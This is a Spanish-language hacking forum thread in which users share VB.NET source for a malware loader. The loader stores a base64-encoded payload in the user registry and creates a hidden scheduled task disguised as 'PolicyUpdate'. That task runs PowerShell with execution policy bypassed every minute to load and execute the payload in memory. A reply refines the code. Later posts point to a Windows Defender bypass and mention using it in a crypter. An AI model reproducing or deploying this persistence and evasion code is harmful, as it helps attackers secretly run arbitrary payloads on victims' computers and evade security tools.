Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOURCE] VB.NET. Ejecutar Payload C/persistencia usando PowerShell + Tasks

  • 3 Respuestas
  • 2228 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 79137913

« en: Junio 06, 2019, 11:27:54 am »
HOLA!!!

Chicos les paso este código muy bueno que armé para ejecutar un payload desde powershell a traves de VBNET con recursos, solo poner el payload en My.Resources.PYLD
Ademas es persistente.
Código: vb.net
  1. Public Class Program
  2.     Public Shared Sub Main()
  3.         Dim Payload As String = Nothing
  4.         Try
  5.             'Convierto recurso a B64
  6.             PYLDSTR= Convert.ToBase64String(My.Resources.PYLD)
  7.         Catch ex As Exception
  8.         End Try
  9.         Try
  10.             'Guardamos en el registro para luego levantarlo
  11.             Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Software\PYLDAPP").SetValue("PYLD", PYLDSTR)
  12.         Catch ex As Exception
  13.         End Try
  14.         Dim PS As String = Nothing
  15.         Try
  16.             PS = "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\PYLDAPP\).PYLD)).EntryPoint.Invoke($Null,$Null)"
  17.             'guardamos el task como PolicyUpdate
  18.             Diagnostics.Process.Start(New Diagnostics.ProcessStartInfo() With {
  19.                 .FileName = "schtasks",
  20.                 .Arguments = "/create /sc minute /mo 1 /tn PolicyUpdate /tr " & """" & PS & """",
  21.                 .CreateNoWindow = True,
  22.                 .ErrorDialog = False,
  23.                 .WindowStyle = Diagnostics.ProcessWindowStyle.Hidden
  24.                 })
  25.         Catch ex As Exception
  26.         End Try
  27.     End Sub
  28. End Class

GRACIAS POR LEER!!!
« Última modificación: Junio 06, 2019, 11:53:07 am por Gabriela »
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   DOORS.PARTY

Desconectado Aincrad

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Email
« Respuesta #1 en: Junio 21, 2019, 08:09:53 pm »
Primero que todo , Que Buen Aporte ! , tal vez te intereza hecharle un ojo a este Run :  https://github.com/OsandaMalith/VBShellCode

lo Edite un poco a mi manera:

Código: vb.net
  1.  ''' ----------------------------------------------------------------------------------------------------
  2.     ''' <summary>
  3.     ''' Handles the <see cref="RunPowerShell"/> event of Execute Payload.
  4.     ''' </summary>
  5.     ''' ----------------------------------------------------------------------------------------------------
  6.     ''' <param name="FilePath">
  7.     ''' Path to Payload.
  8.     ''' </param>
  9.     ''' ----------------------------------------------------------------------------------------------------
  10.  
  11.     Public Sub RunPowerShell(ByVal FilePath As String)
  12.         On Error Resume Next
  13.  
  14.         Dim Payload As String = String.Empty
  15.  
  16.         Dim PS As String =
  17. <a><![CDATA[powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\PYLDAPP\).PYLD)).EntryPoint.Invoke($Null,$Null)]]></a>.Value
  18.        
  19.         Dim PYLDSTR As String = ConvertFileToBase64(FilePath)
  20.  
  21.         CreateSubKey("Software\PYLDAPP", "PYLD", PYLDSTR)
  22.         Diagnostics.Process.Start(New Diagnostics.ProcessStartInfo() With {
  23.             .FileName = "schtasks",
  24.             .Arguments = "/create /sc minute /mo 1 /tn PolicyUpdate /tr " & """" & PS & """",
  25.             .CreateNoWindow = True,
  26.             .ErrorDialog = False,
  27.             .WindowStyle = Diagnostics.ProcessWindowStyle.Hidden
  28.             })
  29.     End Sub
  30.  
  31.     Public Sub CreateSubKey(ByVal Key As String, ByVal ValueName As String, _
  32.                              ByVal Value As String)
  33.         Microsoft.Win32.Registry.CurrentUser.CreateSubKey(Key).SetValue(ValueName, Value)
  34.     End Sub
  35.  
  36.     Public Function ConvertFileToBase64(ByVal fileName As String) As String
  37.         Return Convert.ToBase64String(System.IO.File.ReadAllBytes(fileName))
  38.     End Function


Por Otra parte estas usando muchos Try para literalmente hacer lo errores Invisibles ni los usas para llevar un LOG. eso aparte de quitarle la estetica al codigo es innecesario (el colocar tantos try) con 1 bastaba . pero lo que quieres es que no salgan los errores asi q con el On Error Resume Nex tienes.
« Última modificación: Junio 25, 2019, 05:19:30 pm por Aincrad »

Desconectado 79137913

« Respuesta #2 en: Junio 25, 2019, 09:37:52 am »
HOLA!!!

Si, tenes razon, mucho mas comodo con On Error Resume Next!!!

Igual... ese comentario es de un desarrollador que estuvo en VB6 como yo, me equivoco?

Jajaja, los estandares de .NET no aprueban el uso de OERN

Que bueno ver a otro desarrollador competente!

Viste este post? puede servirte, aun no esta parcheado https://underc0de.org/foro/visual-studio-net/(source)-deshabilitar-windows-defender-en-tiempo-de-ejecucion(vb-net-wd-bypass)/

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   DOORS.PARTY

Desconectado Aincrad

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Email
« Respuesta #3 en: Junio 26, 2019, 09:14:32 am »
Igual... ese comentario es de un desarrollador que estuvo en VB6 como yo, me equivoco?

Jejeje, tienes toda la razón empece con VB6. y después me pase a .net .

Viste este post? puede servirte, aun no esta parcheado https://underc0de.org/foro/visual-studio-net/(source)-deshabilitar-windows-defender-en-tiempo-de-ejecucion(vb-net-wd-bypass)/

Si, De mucha ayuda para usarlo en un Crypter xdd . tal vez lo haga .


 

¿Te gustó el post? COMPARTILO!



[SOURCE] Fake Steam (Steam v2.70.82.9)

Iniciado por Elektro

Respuestas: 0
Vistas: 2142
Último mensaje Mayo 12, 2015, 11:22:33 am
por Elektro
[SOURCE-CODE] Color.NET - Color Picker

Iniciado por Aincrad

Respuestas: 0
Vistas: 2422
Último mensaje Noviembre 15, 2018, 11:23:02 pm
por Aincrad
[SOURCE-CODE] Point Blank MultiHack . Incluye Bypass al X-trap

Iniciado por Aincrad

Respuestas: 0
Vistas: 2807
Último mensaje Junio 01, 2018, 09:00:39 pm
por Aincrad
[SOURCE] PATHS (Administrador de la variable de entorno PATH y PATHEXT)

Iniciado por Elektro

Respuestas: 0
Vistas: 1916
Último mensaje Mayo 12, 2015, 11:23:35 am
por Elektro
[SOURCE] REG2BAT (Convierte archivos de Registro a scripts Batch)

Iniciado por Elektro

Respuestas: 0
Vistas: 2667
Último mensaje Mayo 12, 2015, 11:28:41 am
por Elektro